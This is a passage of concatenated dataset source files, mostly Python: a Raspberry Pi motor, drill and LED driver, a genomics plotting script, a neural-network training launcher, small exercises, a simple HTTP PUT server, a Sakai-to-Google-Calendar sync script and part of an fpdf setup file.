stopMotor(self):\n\t\t\t\t#self.gpio.write(self.R1,0)\n\t\t\t\t#self.gpio.write(self.R2,0)\n\t\t\t\t#self.gpio.write(self.L1,0)\n\t\t\t\t#self.gpio.write(self.L2,0)\n\t\tself.spinMotor('00')\n\n\tdef setSpeed(self,vref_R=80,vref_L=80):\n\t\t# vref_R/vref_L are percentages (0-100), scaled to the 0-255 PWM range\n\t\tvrefR = 2.55*vref_R\n\t\tvrefL = 2.55*vref_L\n\t\tif not (0 <= vref_R <= 100 and 0 <= vref_L <= 100):\n\t\t\t# bug fix: the old check ((v > 0) or (v < 100)) was always true, so it always raised\n\t\t\traise Exception('invalid vref setting value.')\n\t\tself.gpio.setPWM(self.R_VREF,dutycycle=vrefR)\t# bug fix: positional vrefR was taken as the frequency argument\n\t\tself.gpio.setPWM(self.L_VREF,dutycycle=vrefL)\n\n\tdef turnLeft_St(self):\n\t\tprint('turn left')\n\t\tself.spinMotor('10')\n\n\tdef turnRight_St(self):\n\t\tprint('turn right')\n\t\tself.spinMotor('01')\n\t\n\tdef turnLeft(self,Time):\n\t\tprint('turn left')\n\t\tself.spinMotor('10')\n\t\ttime.sleep(Time)\n\t\tself.stopMotor()\n\t\treturn True\n\n\tdef turnRight(self,Time):\n\t\tprint('turn right')\n\t\tself.spinMotor('01')\n\t\ttime.sleep(Time)\n\t\tself.stopMotor()\n\t\treturn True\n\n\tdef moveForward(self,Time):\n\t\tself.spinMotor('11')\n\t\ttime.sleep(Time)\n\t\tself.stopMotor()\n\t\treturn True\n\n\tdef moveForward_St(self):\n\t\tself.spinMotor('11')\n\n\tdef escapeStack(self):\n\t\tself.spinMotor('02')\n\t\ttime.sleep(2)\n\t\tself.stopMotor()\n\t\tself.spinMotor('10')\n\t\ttime.sleep(2)\n\t\tself.stopMotor()\n\t\treturn True\n\t\n\tdef 
testMotor(self):\n\t\tself.spinMotor('12')\n\t\ttime.sleep(2)\n\t\tself.stopMotor()\n\t\tself.spinMotor('21')\n\t\ttime.sleep(2)\n\t\tself.stopMotor()\n\n\tdef terminate(self):\n\t\tself.gpio.terminate()\n\nclass Servo:\n\tdef __init__(self,gpionum,waittime=0.5):\n\t\tself.gpio = Gpio()\n\t\tself.pin = gpionum\n\t\tself.waittime = waittime\t# bug fix: was hard-coded to 0.5, ignoring the argument\n\n\tdef roll(self,pwidth=500):\n\t\tself.gpio.gpio.set_servo_pulsewidth(self.pin,pwidth)\n\t\ttime.sleep(self.waittime)\n\n\tdef swing(self):\n\t\tfor i in range(3):\n\t\t\tself.roll(500)\n\t\t\tself.roll(2500)\n\n\tdef terminate(self):\n\t\tself.gpio.terminate()\n\nclass Drill_TB67H450FNG_knocked_out:\n\tdef __init__(self,pinElvA,pinElvB,pinDA,pinDB):\n\t\tself.gpio = Gpio()\n\t\tself.PELA = pinElvA\n\t\tself.PELB = pinElvB\n\t\tself.DA = pinDA\n\t\tself.DB = pinDB\n\t\tself.motor = MotorControl_TB67H450FNG(self.PELA,self.PELB,self.DA,self.DB,R_speed=255)\n\n\tdef upDrill(self,duration=1,speed=255):\n\t\t# bug fix: a parameter named 'time' shadowed the time module\n\t\tself.motor.R_speed = speed\n\t\tself.motor.spinMotor('20')\n\t\ttime.sleep(duration)\n\t\tself.motor.stopMotor()\n\n\tdef downDrill(self,duration=1,speed=255):\n\t\t# bug fix: this encoder-less variant runs for a fixed duration; 'time' was undefined here\n\t\tself.motor.R_speed = speed\n\t\tself.motor.spinMotor('10')\n\t\ttime.sleep(duration)\n\t\tself.motor.stopMotor()\n\n\tdef spinDrill(self,invert=False):\n\t\tif invert == True:\n\t\t\tself.gpio.toggleOff(self.DA)\n\t\t\tself.gpio.toggleOn(self.DB)\n\t\telse:\n\t\t\tself.gpio.toggleOn(self.DA)\n\t\t\tself.gpio.toggleOff(self.DB)\n\n\tdef stopDrill(self):\n\t\tself.gpio.toggleOff(self.DA)\n\t\tself.gpio.toggleOff(self.DB)\n\n\tdef terminate(self):\n\t\tself.gpio.terminate()\n\nclass Drill_TB67H450FNG:\n\n\tvalue = 0b1111\n\trotate = 0\n\tdeg = 0\t#prev_value = 0b0000\n\n\tdef __init__(self,pinElvA,pinElvB,pinDA,pinDB,pinEA,pinEB,rad=10,maxleng=100):\n\t\tself.gpio = Gpio()\n\t\tself.PELA = pinElvA\n\t\tself.PELB = pinElvB\n\t\tself.DA = pinDA\n\t\tself.DB = pinDB\n\t\tself.PEA = pinEA\n\t\tself.PEB = pinEB\n\t\tself.radius = rad\n\t\tself.length = maxleng\n\t\tself.motor = MotorControl_TB67H450FNG(self.PELA,self.PELB,self.DA,self.DB,R_speed=255)\n\t\tself.cb1 = self.gpio.setInterrupt(pinEA,self.update,'EITHER')\n\t\tself.cb2 = self.gpio.setInterrupt(pinEB,self.update,'EITHER')\n\n\tdef upDrill(self,leng=None,speed=255):\n\t\tif leng == None:\n\t\t\tleng = self.length-20\n\t\telif leng > self.length:\n\t\t\traise Exception('Invalid Argument')\n\t\telif leng < 0:\n\t\t\traise Exception('Invalid Argument')\n\t\tself.motor.R_speed = speed\n\t\tself.motor.spinMotor('20')\n\t\twhile True:\n\t\t\tval = (self.deg/360)*3.14*self.radius\n\t\t\tif (val >= leng):\n\t\t\t\tself.motor.stopMotor()\n\t\t\t\tbreak \n\n\tdef downDrill(self,leng=None,speed=255):\n\t\tif leng == None:\n\t\t\tleng = self.length-20\n\t\telif leng > self.length:\n\t\t\traise Exception('Invalid Argument')\n\t\telif leng < 0:\n\t\t\traise Exception('Invalid Argument')\n\t\tself.motor.R_speed = speed\n\t\tself.motor.spinMotor('10')\n\t\twhile True:\n\t\t\tval = (self.deg/360)*3.14*self.radius\n\t\t\tif (val >= leng):\n\t\t\t\tself.motor.stopMotor()\n\t\t\t\tbreak \n\n\tdef spinDrill(self,invert=False):\n\t\tif invert == True:\n\t\t\tself.gpio.toggleOff(self.DA)\n\t\t\tself.gpio.toggleOn(self.DB)\n\t\telse:\n\t\t\tself.gpio.toggleOn(self.DA)\n\t\t\tself.gpio.toggleOff(self.DB)\n\n\tdef stopDrill(self):\n\t\tself.gpio.toggleOff(self.DA)\n\t\tself.gpio.toggleOff(self.DB)\n\n\tdef terminate(self):\n\t\tself.gpio.terminate()\n\n\tdef update(self,gpio,level,tick):# gear reduction ratio 157:1\n\t\tif gpio == self.PEA:\n\t\t\ttmp = (self.value & 0b0001) + (level << 
1)\n\t\telse:\n\t\t\ttmp = (self.value & 0b0010) + level\n\t\tprev = self.value\n\t\tself.value = ((self.value << 2) & 0b1100) + tmp\n\n\t\tif self.value == 0b1101:\n\t\t\tself.rotate += 1\n\t\telif self.value == 0b0100:\n\t\t\tself.rotate += 1\n\t\telif self.value == 0b0010:\n\t\t\tself.rotate += 1\n\t\telif self.value == 0b1011:\n\t\t\tself.rotate += 1\n\t\telif self.value == 0b1110:\n\t\t\tself.rotate -= 1\n\t\telif self.value == 0b1000:\n\t\t\tself.rotate -= 1\n\t\telif self.value == 0b0001:\n\t\t\tself.rotate -= 1\n\t\telif self.value == 0b0100:\n\t\t\tself.rotate -= 1\n\t\telse:\n\t\t\tself.value = prev\n\n\t\treturn self.rotate\n\n\tdef getRotation(self):\n\t\treturn self.rotate*30/157\n\n\tdef testInterrupt(self,gpio,level,tick):\n\t\tprint(gpio,level,tick)\n\n\nclass Drill_TA7291P:\n\n\ttable_dict = { #データ変換テーブル\n\t\t\t'00':{'00':0,'01':1,'10':-1,'11':-2},#11はエラー\n\t\t\t'01':{'00':-1,'01':0,'10':-2,'11':1},#10はエラー\n\t\t\t'10':{'00':1,'01':-2,'10':0,'11':-1},#01はエラー\n\t\t\t'11':{'00':-2,'01':-1,'10':1,'11':0} #00はエラー\n\t\t}\n\n\tprevios_data = '00'#前回の値\n\tvalue = 0\n\n\tdef __init__(self,pinElvA,pinElvB,pinElv_VREF,pinDA,pinDB,pinEA,pinEB,rad=10,maxleng=100):\n\t\tself.gpio = Gpio()\n\t\tself.PELA = pinElvA\n\t\tself.PELB = pinElvB\n\t\tself.PEL_VREF = pinElv_VREF\n\t\tself.DA = pinDA\n\t\tself.DB = pinDB\n\t\tself.PEA = pinEA\n\t\tself.PEB = pinEB\n\t\tself.radius = rad\n\t\tself.length = maxleng\n\t\tself.gpio.setPinOut(pinElvA)\n\t\tself.gpio.setPinOut(pinElvB)\n\t\tself.gpio.setPinOut(pinDA)\n\t\tself.gpio.setPinOut(pinDB)\n\t\tself.cb1 = self.gpio.setInterrupt(pinEA,self.recData,'RISING')\n\t\tself.cb2 = self.gpio.setInterrupt(pinEB,self.recData,'RISING')\n\n\tdef upDrill(self,leng=None,speed=100):\n\t\tspd = speed/100\n\t\tval = 2000*spd + 500\n\t\tif leng == None:\n\t\t\tleng = self.length-20\n\t\telif leng > self.length:\n\t\t\traise Exception('Invalid Argument')\n\t\telif leng < 0:\n\t\t\traise Exception('Invalid Argument')\n\t\tself.gpio.setPWM(self.PEL_VREF,val)\n\t\tself.gpio.toggleOn(self.PELA)\n\t\tself.gpio.toggleOff(self.PELB)\n\t\twhile True:\n\t\t\tval = (self.deg/360)*3.14*self.radius\n\t\t\tif (val >= leng):\n\t\t\t\tself.gpio.toggleOff(self.PELA)\n\t\t\t\tself.gpio.toggleOff(self.PELB)\n\t\t\t\tbreak \n\n\tdef downDrill(self,leng=None,speed=100):\n\t\tspd = speed/100\n\t\tval = 2000*spd + 500\n\t\tif leng == None:\n\t\t\tleng = 0\n\t\telif leng > self.length:\n\t\t\traise Exception('Invalid Argument')\n\t\telif leng < 0:\n\t\t\traise Exception('Invalid Argument')\n\t\tself.gpio.setPWM(self.PEL_VREF,val)\n\t\tself.gpio.toggleOff(self.PELA)\n\t\tself.gpio.toggleOn(self.PELB)\n\t\twhile True:\n\t\t\tval = (self.deg/360)*3.14*self.radius\n\t\t\tif (val <= leng):\n\t\t\t\tself.gpio.toggleOff(self.PELA)\n\t\t\t\tself.gpio.toggleOff(self.PELB)\n\t\t\t\tbreak \n\n\tdef spinDrill(self,invert=False):\n\t\tif invert == True:\n\t\t\tself.gpio.toggleOff(self.DA)\n\t\t\tself.gpio.toggleOn(self.DB)\n\t\telse:\n\t\t\tself.gpio.toggleOn(self.DA)\n\t\t\tself.gpio.toggleOff(self.DB)\n\n\tdef stopDrill(self):\n\t\tself.gpio.toggleOff(self.DA)\n\t\tself.gpio.toggleOff(self.DB)\n\n\tdef terminate(self):\n\t\tself.gpio.terminate()\n\n\tdef recData(self,gpio,level,tick):#本当はもっと軽い処理にしたいのでこの辺りは改良の余地ありか?\n\t\tfollow_data = '00'#初期化\n\t\tif gpio == self.PEA:#どちらのピンに割り込みが入ったかで分岐\n\t\t\tfollow_data = '{0}{1}'.format('1',self.previos_data[1])\n\t\telif gpio == self.PEB:\n\t\t\tfollow_data = '{0}{1}'.format(self.previos_data[0],'1')\n\t\tself.value += 
self.table_dict[self.previos_data][follow_data]# convert the reading and accumulate it\n\t\tif self.value == -2:\n\t\t\tself.value = 0\n\t\tself.previos_data = follow_data# save the value\n\t\tself.deg = 12*self.value# convert to degrees\n\t\treturn self.deg\n\n\tdef testInterrupt(self,gpio,level,tick):\n\t\tprint(gpio,level,tick)\n\nclass HeatWire:\n\tdef __init__(self,pinFET,duration=3):\n\t\t# renamed from 'time' to avoid shadowing the time module\n\t\tself.gpio = Gpio()\n\t\tself.pin = pinFET\n\t\tself.gpio.setPinOut(pinFET)\n\t\tself.time = duration\n\n\tdef purge(self):\n\t\tself.gpio.toggleOn(self.pin)\n\t\ttime.sleep(self.time)\n\nclass LED:\n\tflag = False\n\talt = True\n\tled1_status = True\n\tled2_status = False\n\tinterval = 0.5\n\n\tdef __init__(self,LED1,LED2):\n\t\tself.gpio = Gpio()\n\t\tself.led1 = LED1\n\t\tself.led2 = LED2\n\n\tdef toggleOn(self,LED1=True,LED2=True):\n\t\tif LED1 == True:\n\t\t\tself.gpio.toggleOn(self.led1)\n\t\tif LED2 == True:\n\t\t\tself.gpio.toggleOn(self.led2)\n\n\tdef toggleOff(self,LED1=True,LED2=True):\n\t\tif LED1 == True:\n\t\t\tself.gpio.toggleOff(self.led1)\n\t\tif LED2 == True:\n\t\t\tself.gpio.toggleOff(self.led2)\n\n\tdef blink(self,LED1=True,LED2=True,alt=True,interval=0.5):\n\t\tif ((LED1 == False) and (alt == True)) or ((LED2 == False) and (alt == True)):\n\t\t\traise Exception('Invalid Argument')\n\t\tself.flag = True\n\t\tself.alt = alt\n\t\tself.interval = interval\n\t\tif self.alt == True:\n\t\t\tself.led1_status = True\n\t\t\tself.led2_status = False\n\t\telse:\n\t\t\tif LED1 == False:\n\t\t\t\tself.led1_status = False\n\t\t\tif LED2 == False:\n\t\t\t\tself.led2_status = False \n\t\twhile self.flag == True: \n\t\t\tself.toggleOn(self.led1_status,self.led2_status)\n\t\t\ttime.sleep(interval)\n\t\t\tif self.alt == True:\n\t\t\t\tif self.led1_status == True:\n\t\t\t\t\tself.led1_status = False\n\t\t\t\telse:\n\t\t\t\t\tself.led1_status = True\n\t\t\t\tif self.led2_status == True: \n\t\t\t\t\tself.led2_status = False\n\t\t\t\telse:\n\t\t\t\t\tself.led2_status = True\n\t\t\t\tcontinue \n\t\t\tself.toggleOff()\n\t\t\ttime.sleep(interval)\n\n\tdef startBlink(self,LED1=True,LED2=True,alt=True,interval=0.5):\n\t\tself.thread = threading.Thread(target=self.blink,args=(LED1,LED2,alt,interval))\n\t\tself.thread.daemon = True\n\t\tself.thread.start()\n\n\tdef stopBlink(self):\n\t\tself.flag = False\n\n\tdef changeBlinkPattern(self,pat='alternate'):\n\t\tif pat == 'alternate':\n\t\t\tself.led1_status = True\n\t\t\tself.led2_status = False\n\t\t\tself.alt = True\n\t\telif pat == 'no_alternate':\n\t\t\tself.led1_status = True\n\t\t\tself.led2_status = True\n\t\t\tself.alt = False\n\t\telif pat == 'led1_only':\n\t\t\tself.alt = False\n\t\t\tself.led1_status = True\n\t\t\tself.led2_status = False\n\t\telif pat == 'led2_only':\n\t\t\tself.alt = False\t# bug fix: was '==', a comparison with no effect\n\t\t\tself.led1_status = False\n\t\t\tself.led2_status = True\n\n\tdef terminate(self):\n\t\tself.gpio.terminate()\n\n\t\t\n\t\t\n\n\n\n\n\n","sub_path":"MagMell/DRV_GPIO.py","file_name":"DRV_GPIO.py","file_ext":"py","file_size_in_byte":14941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"622314996","text":"#!/usr/bin/env python\n__author__ = 'Sergei F. 
Kliver'\nimport sys\nimport argparse\n\nfrom BCBio import GFF\nfrom MACE.Parsers.VCF import CollectionVCF, ReferenceGenome\n\n\ndef list_from_str(s):\n    return s.split(\",\")\n\n\ndef figsize_from_str(s):\n    try:\n        x, y = map(int, s.split(','))\n        return x, y\n    except:\n        raise argparse.ArgumentTypeError(\"Figsize must be x,y\")\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"-i\", \"--input_file\", action=\"store\", dest=\"input\", required=True,\n                    help=\"Input vcf file with mutations.\")\nparser.add_argument(\"-o\", \"--output_file_prefix\", action=\"store\", dest=\"output_prefix\", required=True,\n                    help=\"Prefix of output file with rainfall plot\")\nparser.add_argument(\"-d\", \"--dpi\", action=\"store\", dest=\"dpi\", type=int, default=300,\n                    help=\"Dpi of figure\")\nparser.add_argument(\"-f\", \"--size_of_figure\", action=\"store\", dest=\"size_of_figure\", type=figsize_from_str,\n                    default=(40, 40),\n                    help=\"Size of figure in inches. X and Y values should be separated by comma. Default: 40,40\")\nparser.add_argument(\"-e\", \"--output_formats\", action=\"store\", dest=\"output_formats\", type=list_from_str,\n                    default=[\"svg\", \"eps\", \"pdf\", \"png\", \"jpg\"],\n                    help=\"Comma-separated list of formats (supported by matplotlib) of output figure. Default: svg,eps,pdf,png,jpg\")\nparser.add_argument(\"-l\", \"--suptitle\", action=\"store\", dest=\"suptitle\",\n                    help=\"Suptitle of figure. Default: 'Rainfall plot'\")\nparser.add_argument(\"-g\", \"--draw_gaps\", action=\"store_true\", dest=\"draw_gaps\",\n                    help=\"Draw gaps, ignored if reference genome is not set. Default: False\")\nparser.add_argument(\"-r\", \"--reference_genome\", action=\"store\", dest=\"ref_genome\",\n                    help=\"Fasta file with reference genome, required to draw gaps\")\nparser.add_argument(\"-m\", \"--masked_regions\", action=\"store\", dest=\"masked_regions\",\n                    help=\"Gff file with masked regions\")\nparser.add_argument(\"-b\", \"--logbase\", action=\"store\", dest=\"logbase\", default=2, type=int,\n                    help=\"Logbase of y axis\")\nargs = parser.parse_args()\n\nmutations = CollectionVCF(from_file=True, in_file=args.input, dont_parse_info_and_data=True)\n\nif args.ref_genome:\n    reference_genome = ReferenceGenome(args.ref_genome)\n    reference_genome.find_gaps()\nelse:\n    reference_genome = None\n\nif args.masked_regions:\n    masked_regions = {}\n    with open(args.masked_regions) as gff_fd:\n        for record in GFF.parse(gff_fd):\n            masked_regions[record.id] = record\nelse:\n    masked_regions = None\n\nmutations.rainfall_plot(args.output_prefix, single_fig=True, dpi=args.dpi, figsize=args.size_of_figure,\n                        facecolor=\"#D6D6D6\",\n                        ref_genome=reference_genome, masked_regions=masked_regions, min_gap_length=10,\n                        draw_gaps=args.draw_gaps, suptitle=args.suptitle,\n                        gaps_color=\"#777777\", masked_regions_color=\"#aaaaaa\", logbase=args.logbase,\n                        extension_list=args.output_formats)\n","sub_path":"scripts/draw_rainfall_plot.py","file_name":"draw_rainfall_plot.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"445256626","text":"from training.train import train\r\n\r\nif __name__ == '__main__':\r\n    import argparse\r\n    import os\r\n    \r\n    parser = argparse.ArgumentParser(\r\n        formatter_class=argparse.ArgumentDefaultsHelpFormatter)\r\n\r\n    parser.add_argument('--modeldir', type=str, default='data/Capacity_clrwht2ch_2stim_MNM_clr2ch_6tasks_36perring_512')\r\n    parser.add_argument('--seed', type=int, default=0)\r\n    
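# number of units per ring (consumed below as hp['n_eachring'])\r\n    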
parser.add_argument('--neachring', type=int, default=36)\r\n    args = parser.parse_args()\r\n\r\n    os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\r\n\r\n\r\n    hp = {# number of units each ring\r\n          'n_eachring': args.neachring,\r\n          # number of rings/modalities\r\n          'num_ring': 3,\r\n          'activation': 'softplus',\r\n          'n_rnn': 512,\r\n          'learning_rate': 0.001,\r\n          'mix_rule': True,\r\n          'l1_h': 0.,\r\n          'use_separate_input': False,\r\n          'target_perf': 0.995,\r\n          'mature_target_perf': 0.95,\r\n          'mid_target_perf': 0.65,\r\n          'early_target_perf': 0.35,}\r\n\r\n    train(args.modeldir,\r\n          seed=args.seed,\r\n          hp=hp,\r\n          ruleset='Capacity_clrwht2ch_2stim_MNM_clr2ch_6tasks',\r\n          display_step=500,\r\n          continue_after_target_reached=True,)","sub_path":"Main_training_Capacity_clrwht2ch_2stim_MNM_clr2ch_6tasks_36perring_512.py","file_name":"Main_training_Capacity_clrwht2ch_2stim_MNM_clr2ch_6tasks_36perring_512.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"63356600","text":"import os\nimport time\nimport random\n\nnumbers = []  # renamed from 'list', which shadowed the builtin\nlistPair = []\nlistOdd = []\nfulfill = 0\npair = 0\nodd = 0\ncounter = 0\n\nprint('Creating list...')\ntime.sleep(2)\n\nwhile fulfill < 10:\n    numbers.append(random.randint(1, 100))\n    fulfill += 1\nprint('List created', numbers)\n\nprint('Calculating pair numbers...')\ntime.sleep(2)\n\nwhile pair < len(numbers):\n    if numbers[pair] % 2 == 0:\n        print('Pair found =', numbers[pair])\n        listPair.append(numbers[pair])\n        counter += 1\n    pair += 1\n\nprint('Pair numbers =>', listPair, 'total = ', counter)\n\nprint('Calculating odd numbers...')\ntime.sleep(2)\n\ncounter = 0  # bug fix: reset so the odd total does not include the pair count\nwhile odd < len(numbers):\n    if numbers[odd] % 2 == 1:\n        listOdd.append(numbers[odd])\n        counter += 1\n    odd += 1\n\nprint('Odd numbers =>', listOdd, 'Total =', counter)\n\nos.system('pause')\n","sub_path":"python-exercises/list4/8.L4.py","file_name":"8.L4.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"310886367","text":"import numpy as np\n\ndef map1Dto2D(psi1D, psiBc, nx, ny):\n    psi = np.zeros((ny,nx))\n    \n    row_number = 0\n    for j in range(1,ny-1):\n        for i in range(1,nx-1):\n            psi[j,i] = psi1D[row_number]\n            row_number += 1\n    \n    # Dirichlet BC\n    psi[0,:] = psiBc[0,:]\n    psi[:,0] = psiBc[:,0]\n    psi[-1,:] = psiBc[-1,:]\n    \n    # Neumann BC\n    \n    psi[:,-1] = 2*psi[:,-2] - psi[:,-3]\n    \n    return psi\n","sub_path":"explicitScheme/streamFunctionEnt/map1Dto2D.py","file_name":"map1Dto2D.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"432543890","text":"import http.server as ht\nfrom cgi import parse_header\n\n\nclass RequestHandler(ht.SimpleHTTPRequestHandler):\n\n    def do_PUT(self):\n        length = int(self.headers[\"Content-Length\"])  # renamed from 'len', which shadowed the builtin\n        number = str(self.rfile.read(length), 'utf-8')\n        with open(\"save.txt\",\"w\") as file:\n            file.write(number)\n        self.send_response(200)\n        self.end_headers()\n\n    \nif __name__ == \"__main__\":\n    s = ht.HTTPServer((\"\",8080), RequestHandler)\n    s.serve_forever()\n\n\n\n\n\n\n\n\n","sub_path":"_Scrap/Server_Basic/srv.py","file_name":"srv.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"589827632","text":"\n# author: jason giroux\n# purpose:\n# use google API and SAKAI REST API to take assignments in bridges for rwu and transfer them to google calendar\n# since some professors do not 
use the calendar, this will combine the assignments section with the calendar section\n\n# defining imports needed for this project\n\n# todo:\n# check for assignments and calendar assignments that have a changed date or changed time, cancel the originally scheduled event and reschedule with the new time/date\n# worst case scenario, time is at 10.719 seconds for initial run to add all assignments. need to cut down to 5 seconds.\n\nfrom SakaiPy import SakaiPy\nimport json\nimport dateDict\nimport combineJson\nfrom google_int import integration\nimport threading\nimport time\nimport colorify\n\nclass main():\n    def __init__(self, classes):\n        #credentials file for login\n        self.text = \"creds.json\"\n\n        # raw load for class info before parsing\n        self.info = \"\"\n\n        # calendar\n        self.sak = \"\"\n        self.calendar = \"\"\n        self.calDict = \"\"\n        self.calStrJson = \"\"\n        self.calPartJson = \"\"\n        self.cal = \"\"\n\n        # assignments\n        self.assign = \"\"\n        self.assignDict = \"\"\n        self.assignStrJson = \"\"\n        self.assignPartJson = \"\"\n        self.assignJson = \"\"\n        self.assignCal = \"\"\n\n        self.classes = classes\n        self.fetchedClasses = []\n        self.contents = \"\"\n\n    \"\"\"\n    get calendar from sakai and output to a json file and return a json object\n    exclude classes you are not enrolled in, and assignments that have already passed\n    \"\"\"\n    def getCal(self):\n        self.sak = SakaiPy.SakaiPy(self.info)\n        self.calendar = self.sak.get_calendar()\n        self.calDict = self.calendar.getAllMyEvents()\n        self.calStrJson = json.dumps(self.calDict, ensure_ascii=False)\n        self.calPartJson = json.loads(self.calStrJson)\n\n        self.calJson = self.calPartJson[\"calendar_collection\"]\n        assDict = {}\n\n        # a is the counter\n        # b is the json object\n\n        # loop through and add to the json file if it matches the classes you define above\n        counter = 0\n        for a, b in enumerate(self.calJson):\n            # appending to self.fetchedClasses if any classes are new\n            if a == 0 or not self.fetchedClasses[counter-1] == b[\"siteName\"]:\n                self.fetchedClasses.append(b[\"siteName\"])\n                counter = counter + 1\n\n            # since Sakai returns classes you took last semester, you will need to define the classes you\n            # are currently enrolled in.\n            for i in range(len(self.classes)):\n                temp = b[\"firstTime\"]\n                # determines if it matches your classes and if the assignment is late.\n                if b[\"siteName\"] == self.classes[i] and not dateDict.isLate(temp[\"display\"],b[\"assignmentId\"]):\n                    info = {\n                        \"assignmentId\": b[\"assignmentId\"],\n                        \"entityTitle\": b[\"entityTitle\"],\n                        \"siteName\": b[\"siteName\"],\n                        \"due\": dateDict.dateFormat(temp[\"display\"]),\n                        \"dueTime\": dateDict.combineTime(temp[\"display\"]),\n                        \"instructions\": b[\"description\"],\n                        \"title\": b[\"title\"],\n                        \"type\": b[\"type\"]\n                    }\n                    assDict[b['assignmentId']] = info\n                else:\n                    continue\n        self.cal = assDict\n        # self.returnClassList()\n\n    \"\"\"\n    fetches the assignments from sakai and stores them in self.contents\n    \"\"\"\n    def getAssign(self):\n        self.sak = SakaiPy.SakaiPy(self.info)\n        self.assign = self.sak.get_assignment()\n        self.assignDict = self.assign.getAllMyAssignments()\n        self.assignDict = self.assignDict[\"assignment_collection\"]\n        assignDict = {}\n        for a, b in enumerate(self.assignDict):\n            try:\n                if self.cal[b[\"id\"]]:\n                    continue\n\n            except KeyError as err:\n                # if it is not late, add it to the json\n                if not dateDict.assignIsLate(b[\"dueTimeString\"], b[\"id\"]):\n                    due, time = dateDict.returnDateAndTimeAssign(b[\"dueTimeString\"])\n                    assignInfo = {\n                        \"assignmentId\": b[\"id\"],\n                        \"entityTitle\": 
b[\"entityTitle\"],\n \"instructions\": b[\"instructions\"],\n \"gradebookItemName\": b[\"gradebookItemName\"],\n \"due\": due,\n \"dueTime\": time,\n \"title\": b[\"title\"],\n \"type\": b[\"status\"]\n }\n assignDict[b['id']] = assignInfo\n else:\n continue\n\n self.contents = assignDict\n\n \"\"\"\n calendar returns classes that you are not enrolled in. this method will look through the returns object \n from the calendar and create a list of all the classes it pulled\n retuned list from cal = self.cal\n \"\"\"\n def returnClassList(self):\n # a = counter, b = object\n for a, b in enumerate(self.calJson):\n print(\"printing b\")\n print(b)\n temp = self.calJson[b]\n self.fetchedClasses.append(temp[\"siteName\"])\n\n print(\"Fetched classes from Calendar: \", self.fetchedClasses)\n\n # load the JSON file into self.info\n # this is a getter method for the creds file.\n def permissive_json_loads(self):\n with open(self.text) as cred:\n self.info = json.load(cred)\n\n\n# define the name of your classes to be scanned through and given a JSON file\nclasses = [\"COMSC.492.01-20/SP Integ Senior Design II\", \"COMSC.410.01-20/SP Artificial Intelligence\", \"COMSC.440.01-20/SP LangTranslation/Compiler Dsgn\", \"PHYS.330.01-20/SP Intro Phys Oceanography\" ]\n\nstart_time = time.time()\n\njason = main(classes)\njason.permissive_json_loads()\n\nt1 = threading.Thread(target=jason.getCal())\nt2 = threading.Thread(target=jason.getAssign())\n\nt1.start()\nt2.start()\nt1.join()\nt2.join()\n\nportal = combineJson.start(jason.contents, jason.cal)\ninter = integration(portal)\n\nintegration.creds(inter)\nintegration.Getcalendar(inter)\nintegration.checkDuplicates(inter)\n\nend_time = time.time()\ntime_lapsed = end_time - start_time\nm = \"Classes detected: \" + str(jason.fetchedClasses)\ncolorify.prGreen(m)\nm = \"TIME LAPSED: \"+str(time_lapsed)+\" s\"\ncolorify.prRed(m)\n","sub_path":"electron_app/PyEngine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"443940284","text":"import quantum_test as qnn\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndata = np.loadtxt(\"sine.txt\")\ninp = data[:, 0]\nout = data[:, 1]\n\nqnn1 = qnn.qnn()\nqnn1[\"init\"](5)\nweights = qnn1[\"train\"](inp, out, 2)\nx_pred = np.linspace(-1, 1, 50)\npredictions = qnn1[\"test\"](x_pred, weights)\n\nqnn2 = qnn.qnn()\nqnn2[\"set_var\"](qnn1[\"get_var\"]())\nweights = qnn2[\"train\"](inp, out, 2)\npredictions2 = qnn2[\"test\"](x_pred, weights)\n\nplt.figure()\nplt.scatter(inp, out)\nplt.scatter(x_pred, predictions, color=\"green\")\nplt.scatter(x_pred, predictions2, color=\"red\")\nplt.xlabel(\"x\")\nplt.ylabel(\"f(x)\")\nplt.tick_params(axis=\"both\", which=\"major\")\nplt.tick_params(axis=\"both\", which=\"minor\")\nplt.show()\n","sub_path":"quantumudql/practice/first_try/attempting_something_new.py","file_name":"attempting_something_new.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"418087915","text":"#!/usr/bin/env python\n\nfrom distutils.core import setup\n\nimport sys\n\nif sys.version_info >= (3, 0):\n import fpdf_py3k as fpdf\n package_dir = 'fpdf_py3k'\nelse:\n import fpdf\n package_dir = 'fpdf'\n \nsetup(name='fpdf',\n version=fpdf.__version__,\n description='Simple PDF generation for Python',\n author='Olivier PLATHEY ported by Max',\n author_email='maxpat78@yahoo.it',\n maintainer = 
